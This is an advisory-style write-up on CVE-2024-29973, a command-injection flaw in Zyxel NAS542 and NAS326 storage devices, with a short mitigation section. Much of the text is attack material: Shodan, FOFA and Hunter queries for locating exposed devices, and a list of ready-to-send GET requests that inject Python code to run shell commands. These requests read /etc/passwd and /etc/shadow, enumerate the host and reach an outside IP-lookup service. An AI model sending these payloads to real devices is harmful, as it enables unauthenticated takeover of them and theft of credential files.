CVE-2024-29973 is a critical vulnerability found in certain Zyxel networking devices. This vulnerability allows an unauthenticated attacker to execute arbitrary commands on the target device by exploiting improper input validation mechanisms in the firmware. Attackers can send specially crafted HTTP requests to the device, injecting system-level commands and potentially gaining full control over the device.
Hunter: product.name="ZyXEL NAS542"||product.name="ZyXEL NAS326" FOFA: app="NAS542" || app="ZYXEL-NAS326" SHODAN: http.title:"Zyxel NAS326"
Command Injection: The vulnerability arises due to insufficient input sanitization in one of the device's web interfaces. This flaw allows attackers to append operating system commands within parameters of HTTP requests.
Exploit Example: Attackers can inject commands through an HTTP GET request, like the one below, to execute arbitrary code:
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("id",+shell=True)%23 HTTP/1.1Impact: Successful exploitation results in the ability to execute system commands, potentially leading to remote control over the device, data leakage, or further compromise of the network.
To mitigate the risks associated with this vulnerability, follow these steps:
Firmware Update: Ensure that all Zyxel devices are updated to the latest firmware version. Zyxel has released patches that address this vulnerability. Regularly check for updates and apply them promptly.
Network Segmentation: Isolate vulnerable devices from critical network infrastructure. Only expose necessary services and ensure administrative interfaces are not publicly accessible.
Firewall Configuration: Restrict incoming and outgoing traffic to essential services only. Block unnecessary HTTP access to Zyxel devices.
Monitor for Suspicious Activity: Implement logging and monitoring tools that can detect and alert on unusual behavior, such as repeated login attempts or abnormal traffic patterns.
References National Vulnerability Database - CVE-2024-29973 Zyxel Security Advisory
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("cat+/etc/passwd",+shell=True)%23 HTTP/1.1GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("cat+/etc/shadow",+shell=True)%23 HTTP/1.1GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("curl+ifconfig.me",+shell=True)%23 HTTP/1.1GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("hostname",+shell=True)%23 HTTP/1.1GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("ip+a",+shell=True)%23 HTTP/1.1GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("uname+-a",+shell=True)%23 HTTP/1.1GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("cat+/etc/group",+shell=True)%23 HTTP/1.1